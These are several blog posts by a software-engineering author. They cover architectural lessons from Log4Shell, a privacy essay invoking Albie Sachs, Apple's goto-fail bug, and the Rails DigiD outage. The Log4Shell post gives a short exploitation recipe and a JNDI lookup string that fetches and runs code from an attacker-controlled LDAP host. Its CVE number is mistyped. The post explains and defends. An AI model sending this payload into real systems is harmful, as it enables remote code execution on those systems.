Log4Shell: Lessons Learned for Software Architects

This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-4428). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination. What are the key lessons you as a software architects can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would lookup a Java class on the LDAP server mentioned, and execute that class.

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

  1. Create a nasty class that you would like to execute on your target;
  2. Set up your own LDAP server somewhere that can serve your nasty class;
  3. "Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" where ever possible — in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: If your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system to any new attacks (until the system is re-started).

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

  1. Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
  2. Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
  3. Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, in version 2.13 support for Java 7 was stopped. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have other security problems than just log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache SOLR, neo4j, Elastic Search, or Apache Struts: See the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Srping, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.

Deploying the Fix

Deploying the fix yourself should be simple, and with an adequate continuous deployment infrastructure a simple push of a button or reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here investements in a smooth update process pay off, as well a disciplined versioning approach that encourages customers to update their system regularly, without as little incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it imperative that you donate back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood and impact such an event would have on confidentiality, integrity and availability of that system.

This requires investments in:

  • Maintainability: Enforcing dependency hygiene, keeping dependencies current at all times, to minimize mean time to repair and maximize availability
  • Deployment security: Isolating components where possible and logging access, to safeguard confidentiality and integrity;
  • Upgradability: Ensure that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
  • The open source eco-system: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that as an architect you must be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

A South African Perspective on Privacy and Intelligence

The Dutch government has proposed a new law on intelligence and security services (“Wet op de inlichtingen- en veiligheidsdiensten” — Wiv20XX).

As several privacy-related organizations have made clear, this law proposes non-specific (bulk) interception powers for any form of telecom or data transfer without independent ex-ante review or court involvement (see the summary by Matthijs Koot, and reactions on the bill by Bits of Freedom, Privacy International, the Institute for Information Law of the University of Amsterdam IVIR, and the Internet Society ISOC).

This bill gives the Dutch government unprecedented power to violate the privacy of its citizens. Either the Dutch government does not recognize the crucial role of privacy in a well-functioning democracy, or it does not realize what enormous privacy infringements are made possible through Internet surveillance.

Book cover Sachs' Soft Vengeance

When discussing the importance of privacy, I am always reminded of South Africa’s anti-apartheid activist Albie Sachs and his autobiography “The Soft Vengeance of a Freedom Fighter” (first published in 1990, and turned into a film in 2014).

As a law student at the University of Capetown, Albie Sachs started fighting apartheid at the age of 17, in 1952. He was imprisoned from 1963-1964 (solitary confinement) and again in 1966, after which he was exiled from his home country South Africa.

In 1988, living in Maputo, Mozambique, he lost his right arm and an eye when his car was bombed by the South African secret police.

From 1991 until 1993, after Nelson Mandela’s release in 1990, Albie Sachs played a pivotal role in the negotiations leading to the new South African constitution.

In 1994 Nelson Mandela appointed him as judge of the highest court of South Africa, the Constitutional Court. He worked for the Truth and Reconciliation Commission between 1995 and 1998.

Albie Sachs wrote his Soft Vengeance in 1989. Nelson Mandela was still in prison, and the struggle against Apartheid was not won yet. Albie Sachs had just lost his arm and eye, and his book was his attempt to cope with his injuries.

For his recovery he was flown into a London hospital. He noticed that he was remarkably optimistic, and he was wondering why. Here is his reason (p.58):

“Perhaps part of my pleasure at being in this hospital room is that I am fairly sure it is not bugged. Sometimes I used to imagine my phone in Maputo being listened in to by at least three different secret services […]”

“Possibly my continuing sense of post-bomb euphoria comes from the fact that at least for the time being I am out of the net of hidden sensors, my spirit free from spying for the first time in three decades.”

He explains what it means to be surveilled:

“Ever since I was seventeen I have been politically active, I have lived with the notion that there are others accompanying every move I make, listening to every word I say.”

“Did the secret police really follow every up and down of my marriage, pick up the terms of our divorce, record automatically the names of our children even before they were entered in the birth register?”

And this gives rise to his dream for the future:

“I too have a dream, that there will one day be a world without police files, and bugged rooms, and tapped telephones, and intercepted mail, and that I will actually live in it.”

Albie Sachs is not alone in his dream. According to article 12 of the United Nations Universal Declaration of Human Rights, we all have a right to privacy:

“No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honour and reputation. Everyone has the right to the protection of the law against such interference or attacks.”

To date, the Internet has given us amazing possibilities to communicate with our family and friends, to search, read, and share information on almost any topic we find interesting, and to shop for almost any item we think we need. As a software engineering educator and researcher, I am proud to have played a tiny part in making this happen.

Unfortunately, the Internet can also be used as a place for massive surveillance activities, at levels that, for example, the South African apartheid regime could only have dreamed of. As a software engineer, I am terrified by the technical opportunities the Internet provides to governments wishing to know everything about their citizens.

A government aimed at drafting a modern intelligence bill should recognize this immense power, and take responsibility to safeguard the necessary privacy protection.

The Dutch government has failed to do so. It has proposed a bill with insufficient independent oversight, a bill that oppressive regimes, such as the former South African regime, would be happy to embrace.

Luckily, the present bill is still a draft. I sincerely hope that the final version will offer adequate privacy protection, and bring the world closer to the dream of Albie Sachs.

Learning from Apple’s #gotofail Security Bug

Yesterday, Apple announced iOS7.0.6, a critical security update for iOS7 — and an update for OSX / Safari is likely to follow soon (if you haven’t updated iOS yet, do it now).

The problem turns out to be caused by a seemingly simple programming error, now widely discussed as #gotofail on Twitter.

What can we, as software engineers and educators of software engineers, learn from this high impact bug?

The Code

A careful analysis of the underlying problem is provided by Adam Langley. The root cause is in the following code:

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
    OSStatus        err;
    ...

    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;
    ...

fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;
}

To any software engineer, the two consecutive goto fail lines will be suspicious. They are, and more than that. To quote Adam Langley:

The code will always jump to the end from that second goto, err will contain a successful value because the SHA1 update operation was successful and so the signature verification will never fail.

Not verifying a signature is exploitable. In the upcoming months, there will remain plenty of devices running older versions of iOS and MacOS. These will remain vulnerable, and epxloitable.

Brittle Software Engineering

When first seeing this code, I was once again caught by how incredibly brittle programming is. Just adding a single line of code can bring a system to its knees.

For seasoned software engineers this will not be a real surprise. But students and aspiring software engineers will have a hard time believing it. Therefore, sharing problems like this is essential, in order to create sufficient awareness among students that code quality matters.

Code Formatting is a Security Feature

When reviewing code, I try to be picky on details, including white spaces, tabs, and new lines. Not everyone likes me for that. I often wondered whether I was just annoyingly pedantic, or whether it was the right thing to do.

The case at hand shows that white space is a security concern. The correct indentation immediately shows something fishy is going on, as the final check now has become unreachable:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Insisting on curly braces would hightlight the fault even more:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0) {
        goto fail;
    }
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Indentation Must be Automatic

Because code formatting is a security feature, we must not do it by hand, but use tools to get the indentation right automatically.

A quick inspection of the sslKeyExchange.c source code reveals that it is not routinely formatted automatically: There are plenty of inconsistent spaces, tabs, and code in comments. With modern tools, such as Eclipse-format-on-save, one would not be able to save code like this.

Yet just forcing developers to use formating tools may not be enough. We must also invest in improving the quality of such tools. In some cases, hand-made layout can make a substantial difference in understandability of code. Perhaps current tools do not sufficiently acknowledge such needs, leading to under-use of today’s formatting tools.

Code Review to the Rescue?

Besides automated code formatting, critical reviews might also help. In the words of Adam Langley:

Code review can be effective against these sorts of bug. Not just auditing, but review of each change as it goes in. I’ve no idea what the code review culture is like at Apple but I strongly believe that my colleagues, Wan-Teh or Ryan Sleevi, would have caught it had I slipped up like this. Although not everyone can be blessed with folks like them.

While I fully subscribe to the importance of reviews, a word of caution is at place. My colleague Alberto Bacchelli has investigated how code review is applied today at Microsoft. His findings (published as a paper at ICSE 2013, and nicely summarized by Alex Nederlof as The Truth About Code Reviews) include:

There is a mismatch between the expectations and the actual outcomes of code reviews. From our study, review does not result in identifying defects as often as project members would like and even more rarely detects deep, subtle, or “macro” level issues. Relying on code review in this way for quality assurance may be fraught.

Automated Checkers to the Rescue?

If manual reviews won’t find the problem, perhaps tools can find it? Indeed, the present mistake is a simple example of a problem caused by unreachable code. Any computer science student will be able to write a (basic) “unreachable code detector” that would warn about the unguarded goto fail followed by more (unreachable) code (assuming parsing C is a ‘solved problem’).

Therefore, it is no surprise that plenty of commercial and open source tools exist to check for such problems automatically: Even using the compiler with the right options (presumably -Weverything for Clang) would warn about this problem.

Here, again, the key question is why such tools are not applied. The big problem with tools like these is their lack of precision, leading to too many false alarms. Forcing developers to wade through long lists of irrelevant warnings will do little to prevent bugs like these.

Unfortunately, this lack of precision is a direct consequence of the fact that unreachable code detection (like many other program properties of interest) is a fundamentally undecidable problem. As such, an analysis always needs to make a tradeoff between completeness (covering all suspicious cases) and precision (covering only cases that are certainly incorrect).

To understand the sweet spot in this trade off, more research is needed, both concerning the types of errors that are likely to occur, and concerning techniques to discover them automatically.

Testing is a Security Concern

As an advocate of unit testing, I wonder how the code could have passed a unit test suite.

Unfortunately, the testability of the problematic source code is very poor. In the current code, functions are long, and they cover many cases in different conditional branches. This makes it hard to invoke specific behavior, and bring the functions in a state in which the given behavior can be tested. Furthermore, observability is low, especially since parts of the code deliberately obfuscate results to protect against certain times of attacks.

Thus, given the current code structure, unit testing will be difficult. Nevertheless, the full outcome can be tested, albeit it at the system (not unit) level. Quoting Adam Langley again:

I coded up a very quick test site at https://www.imperialviolet.org:1266. […] If you can load an HTTPS site on port 1266 then you have this bug.

In other words, while the code may be hard to unit test, the system luckily has well defined behavior that can be tested.

Coverage Analysis

Once there is a set of (system or unit level) tests, the coverage of these tests can be used an indicator for (the lack of) completeness of the test suite.

For the bug at hand, even the simplest form of coverage analysis, namely line coverage, would have helped to spot the problem: Since the problematic code results from unreachable code, there is no way to achieve 100% line coverage.

Therefore, any serious attempt to achieve full statement coverage should have revealed this bug.

Note that trying to achieve full statement coverage, especially for security or safety critical code, is not a strange thing to require. For aviation software, statement coverage is required for criticality “level C”:

Level C:

Software whose anomalous behavior, as shown by the system safety assessment process, would cause or contribute to a failure of system function resulting in a major failure condition for the aircraft.

This is one of the weaker categories: For the catastrophic ‘level A’, even stronger test coverage criteria are required. Thus, achieving substantial line coverage is neither impossible nor uncommon.

The Return-Error-Code Idiom

Finally, looking at the full sources of the affected file, one of the key things to notice is the use of the return code idiom to mimic exception handling.

Since C has no built-in exception handling support, a common idiom is to insist that every function returns an error code. Subsequently, every caller must check this returned code, and include an explicit jump to the error handling functionality if the result is not OK.

This is exactly what is done in the present code: The global err variable is set, checked, and returned for every function call, and if not OK followed by (hopefully exactly one) goto fail.

Almost 10 years ago, together with Magiel Bruntink and Tom Tourwe, we conducted a detailed empirical analysis of this idiom in a large code base of an embedded system.

One of the key findings of our paper is that in the code we analyzed we found a defect density of 2.1 deviations from the return code idiom per 1000 lines of code. Thus, in spite of very strict guidelines at the organization involved, we found many examples of not just unchecked calls, but also incorrectly propagated return codes, or incorrectly handled error conditions.

Based on that, we concluded:

The idiom is particularly error prone, due to the fact that it is omnipresent as well as highly tangled, and requires focused and well-thought programming.

It is sad to see our results from 2005 confirmed today.


© Arie van Deursen, February 22, 2014.


EDIT February 24, 2014: Fixed incorrect use of ‘dead code detection’ terminology into correct ‘unreachable code detection’, and weakened the claim that any computer science student can write such a detector based on the reddit discussion.


Design for Upgradability and the Rails DigiD Outage

On January 9th, the Dutch DigiD system was taken offline for 9 hours. The reason was a vulnerability (CVE-2013-0155 and CVE-2013-0156) in the underlying Ruby on Rails system used. According to the exploit, it enables attackers to bypass authentication, inject SQL, perform a denial of service, or execute arbitrary code.

DigiD is a Dutch authentication system used by over 600 organizations, including the national taxes. Over 9 million Dutch citizens have a DigiD account, which they must use for various interactions with the government, such as filing taxes electronically. The organization responsible for DigiD maintenance, Logius, decided to take DigiD off line when it heard about the vulnerability. It then updated the Rails system to a patched version. The total downtime of DigiD was about 9 hours (from 12:20 until 21:30). Luckily, it seems DigiD was never comprimised.

The threat was real enough, though, as illustrated by the Bitcoin digital currency system: the Bitcoin currency exchange called Vircurex actually was compromised. According to Vircurex, it was able to “deploy fixes within five minutes after receiving the notification from the Rails security mailing list.”

To better understand the DigiD outage, I contacted spokesman Michiel Groeneveld from Logius. He stated that (1) applying the fix was relatively easy, and that (2) most of the down time was caused by “extensively testing” the new release.

Thus, the real lesson to be learned here is that speed of upgrading is crucial to reduce downtime (ensure high availability) in case a third party component turns into a security vulnerability. The software architect caring about both security and availability, must apply design for upgradability (categorized under replaceability in ISO 25010).

Any upgrade can introduce incompatibilities. Even the patch for this Rails vulnerability introduced a regression. Design for upgradability is about dealing with such regressions. It involves:

  1. Isolation of depedencies on the external components, for example through the use of wrappers or aspects in order to reduce the impact of incompatibilities.

  2. Dependency hygiene, ensuring the newest versions of external components are used as soon as they are available (which is good security policy anyway). This helps avoid the accumulation of incompatibilities, which may cause updates to take weeks rather than minutes (or even hours). Hot security fixes may even be unavailable for older versions: For Ruby on Rails, which is now in version 3.x, the most popular comment at the fix site was a telling “lots of love from people stuck on 2.3

  3. Test automation, in order to reduce the execution time of regression tests for the system working with the upgraded component. This will include end-to-end system tests, but can also include dedicated tests ensuring that the wrappers built meet the behavior expected from the component.

  4. Continuous deployment, ensuring that once the source code can deal with the upgraded library, the actual system can be deployed with a push on the button.

None of these comes for free. In other words, the product owner should be willing to invest in these. It is the responsibility of the architect to make clear what the costs and benefits are, and what the risks are of not investing in isolation, dependency hygiene, test automation, and continuous deployment. In this explanation, the architect can point to additional benefits, such as better maintainability, but these may be harder to sell than security and availability.

This brings me to two research connections of this case.

The first relates to regression testing. A hot fix for a system that is down is a case where it actually matters how long the execution of an (automated) regression test suite takes: test execution time in this case equals down time. Intuitively, test cases covering functionality for which Rails is not even used, need not be executed. This is where the research area of selective regression testing comes in. The typical technique uses control flow analysis in order to reduce a large regression test suite given a particular change. This is classic software engineering research dating back to the 90s: For a representative article have a look at Rothermel and Harrold’s Safe, Efficient Regression Test Selection Technique.

Design for upgradability also relates to some of the research I’m involved in.
What an architect caring about upgradability can do is estimate the anticipated upgrading costs of an external component. This could be based on a library’s “compatibility reputation”. But how can we create such a compatibility rating?

At the time of writing, we are working on various metrics that use a library’s release history in order to predict API stability. We are using the (huge) maven repository to learn about breaking changes in libraries in the wild, and we are investigating to what extent encapsulation practices are effective. With that in place, we hope to be able to provide decision support concerning the maintainability costs of using third party libraries.

For our first results, have a look at our ICSM 2012 paper on Measuring Library Stability Through Historical Version Analysis — for the rest, stay tuned, as there is more to come.

EDIT (February 4, 2013)

For a more detailed account of the impact of the Rails vulnerabilites, have a look at What The Rails Security Issue Means For Your Startup by Patrick McKenzie. The many (sometimes critical) comments on that post are also an indication for how hard upgrading in practice is (“How does this help me … when I have a multitude of apps running some Rails 1.x or 2.x version?“).

An interesting connection with API design is provided by Ned Batchelder, who suggests to rename .load and .safe_load to .dangerous_load and .load, respectively (in a Python setting in which similar security issues exist).

EDIT (April 4, 2013)

As another (separate) example of an urgent security fix, today (April 4, 2013), the PostgreSQL Global Development Group has released a security update to all current versions of the PostgreSQL database system. The most important security issue fixed in this release, CVE-2013-1899, makes it possible for a connection request containing a database name that begins with “-” to be crafted that can damage or destroy files within a server’s data directory.

Here again, all users of the affected versions are strongly urged to apply the update immediately, illustrating once more the need to be able to upgrade rapidly.